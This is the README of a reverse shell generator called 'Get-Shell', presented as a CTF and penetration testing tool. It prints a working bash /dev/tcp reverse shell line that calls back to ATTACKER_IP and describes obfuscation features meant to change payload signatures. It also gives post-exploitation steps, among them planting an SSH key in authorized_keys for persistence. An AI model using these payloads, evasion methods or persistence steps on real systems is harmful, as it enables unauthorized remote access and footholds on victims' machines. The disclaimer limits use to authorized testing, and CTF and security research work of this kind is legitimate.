____      _      ____  _          _ _
  / ___| ___| |_   / ___|| |__   ___| | |
 | |  _ / _ \ __|  \___ \| '_ \ / _ \ | |
 | |_| |  __/ |_    ___) | | | |  __/ | |
  \____|\___|\__|  |____/|_| |_|\___|_|_|

The Ultimate CTF Reverse Shell Framework

---

How It Works

┌─────────────────────────────────────────────────────────────────┐
│                     ATTACKER MACHINE                            │
│                                                                 │
│  python getshell.py gen bash_tcp -i tun0 --lport 4444 --listen │
│                                                                 │
│  [1] Generates payload ──► copies to clipboard                 │
│  [2] Starts listener   ──► waits on 0.0.0.0:4444               │
└───────────────────────────────┬─────────────────────────────────┘
                                │
                   You inject the payload via RCE:
                   (command injection / web shell /
                    file upload / SQL shell / ...)
                                │
                                ▼
┌───────────────────────────────────────────────────────────────┐
│                      VICTIM MACHINE                           │
│                                                               │
│  bash -c 'xY3k=/bin/bash;                                    │
│            exec 3<>/dev/tcp/ATTACKER_IP/4444;                 │
│            $xY3k -i <&3 >&3 2>&3'                            │
│                                                               │
│  Victim CALLS BACK ──────────────────────────────────────►   │
└───────────────────────────────────────────────────────────────┘
                                │
                                ▼
        ┌────────────────────────────────┐
        │  [+] Connection from x.x.x.x  │
        │  [*] PTY upgrade sent          │
        │  kali@victim:~$ whoami         │
        │  kali                          │  ← Shell dropped!
        └────────────────────────────────┘

---

Demo

Get-Shell generating a bash_tcp payload and catching the reverse shell

Privilege escalation to root after gaining initial access

---

Features

Feature	Description
Plugin-based architecture	Drop a .py file in payloads/<os>/ — auto-discovered at runtime
Auto IP detection	-i tun0 resolves VPN interface IP without manual lookups
Variable randomization	Every payload generation uses unique random identifiers
Junk code injection	--obfuscate flag alters the byte signature per run
Integrated PTY listener	Built-in multi-threaded listener replaces nc -lvnp
Auto PTY upgrade	--upgrade sends pty.spawn automatically on connect
One-shot workflow	--listen chains generation and listening into a single command
Clipboard copy	--copy pushes the payload straight to your clipboard
Graceful fallbacks	colorama, pyperclip, psutil are optional — tool never crashes

---

Table of Contents

• Installation
• Quick Start
• Usage Reference
  • list
  • gen
  • listen
  • ifaces
• Supported Payloads
• Adding Custom Payloads
• Post-Exploitation Tips
• Contributing
• License

---

Installation

git clone https://github.com/YOUR_USERNAME/Get-Shell.git
cd Get-Shell

# All dependencies are optional — install only what you need
pip install -r requirements.txt

Package	Purpose	Required?
colorama	Coloured terminal output	No (plain text fallback)
pyperclip	--copy flag	No (manual copy fallback)
psutil	-i <iface> IP resolution	No (use --lip instead)

---

Quick Start

# 1. List available payloads
python getshell.py list

# 2. Generate a payload + start listener in ONE command
python getshell.py gen bash_tcp -i tun0 --lport 4444 --listen --upgrade --copy

# 3. Paste the copied payload on the victim → shell drops to you

---

Usage Reference

list — Browse Payloads

python getshell.py list [--os linux|windows] [--category terminal|web|...]

  bash_tcp               [linux  /terminal  ]  Pure-bash /dev/tcp reverse shell.
  python_pty             [linux  /terminal  ]  Python3 PTY reverse shell.
  powershell_obfuscated  [windows/terminal  ]  PowerShell TCP shell with random vars.

gen — Generate a Payload

python getshell.py gen <name> --lport <port>
                              [--lip <ip>]
                              [-i <iface> | --auto-ip]
                              [--obfuscate]
                              [--copy]
                              [--listen [--upgrade] [--lhost <bind>]]

Flag	Description
name	Payload name from list
--lport	Your listener port (required)
--lip	Your listener IP (auto-detected if omitted)
-i / --iface	Interface name for IP resolution (e.g. tun0)
--obfuscate	Inject junk code + randomize variable names
--copy	Copy rendered payload to clipboard
--listen	Start listener after generating
--upgrade	With --listen: send PTY upgrade on connect
--lhost	With --listen: bind address (default 0.0.0.0)

Examples:

# HackTheBox / TryHackMe (VPN interface)
python getshell.py gen bash_tcp -i tun0 --lport 4444 --listen --upgrade --copy

# Manual IP + obfuscation
python getshell.py gen python_pty --lip 10.10.14.5 --lport 9001 --obfuscate

# Windows target
python getshell.py gen powershell_obfuscated -i tun0 --lport 443 --copy

listen — Standalone Listener

python getshell.py listen --lport <port> [--lhost <bind>] [--upgrade]

python getshell.py listen --lport 4444
python getshell.py listen --lport 4444 --upgrade

ifaces — Enumerate Interfaces

python getshell.py ifaces

Lists all local network interfaces and their IPv4 addresses. Use this to find the correct interface name for the -i flag.

---

Supported Payloads

Name	OS	Category	Description
bash_tcp	Linux	terminal	Pure-bash /dev/tcp — no external binaries
python_pty	Linux	terminal	Python3 with PTY spawn — interactive immediately
powershell_obfuscated	Windows	terminal	PowerShell TCP with randomized variable names

Adding your own? → See CONTRIBUTING.md

---

Adding Custom Payloads

Get-Shell uses importlib to auto-discover payload plugins. No core code changes needed.

# 1. Copy the boilerplate
cp payloads/sample_payload.py.example payloads/linux/my_shell.py

# 2. Fill in metadata + template

# 3. Verify it loads
python getshell.py list
python getshell.py gen my_shell --lport 4444

Full documentation → CONTRIBUTING.md

---

Post-Exploitation Tips

After catching a shell, run these to improve interactivity:

# Upgrade to PTY (on victim)
python3 -c 'import pty; pty.spawn("/bin/bash")'

# On attacker — background with Ctrl+Z, then:
stty raw -echo; fg

# Set terminal dimensions
export TERM=xterm-256color
stty rows 50 cols 200

# Stable alternative channel
# Drop your SSH key to ~/.ssh/authorized_keys

---

Project Structure

Get-Shell/
├── getshell.py              # CLI entry point (argparse subcommands)
├── requirements.txt
├── core/
│   ├── loader.py            # Plugin discovery via importlib
│   ├── obfuscator.py        # random_var() + inject_junk()
│   ├── network.py           # Interface IP resolution
│   ├── ui.py                # colorama wrapper + clipboard
│   └── tips.py              # Post-exploitation tip bank
├── payloads/
│   ├── base.py              # Payload base class (plugin contract)
│   ├── sample_payload.py.example   # Boilerplate for new plugins
│   ├── linux/
│   │   ├── bash_tcp.py
│   │   └── python_pty.py
│   └── windows/
│       └── powershell_obfuscated.py
└── listeners/
    └── tcp_listener.py      # Multi-threaded socket listener

---

Contributing

Contributions are welcome — new payload templates especially!

• Read CONTRIBUTING.md before opening a PR
• Use the boilerplate at payloads/sample_payload.py.example
• All code must pass flake8 (max line length: 120)
• Open an issue first for large changes

---

License

MIT — use it, break things (ethically), share improvements.

Disclaimer: This tool is intended for authorized penetration testing, CTF competitions, and security research. Unauthorized use against systems you do not own or have explicit permission to test is illegal.

---

_{Built for the CTF community · Want to add a payload? See CONTRIBUTING.md}